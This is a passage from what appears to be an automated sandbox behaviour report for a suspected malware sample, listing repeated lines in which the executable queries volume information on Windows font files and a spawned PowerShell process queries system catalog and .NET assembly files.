                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
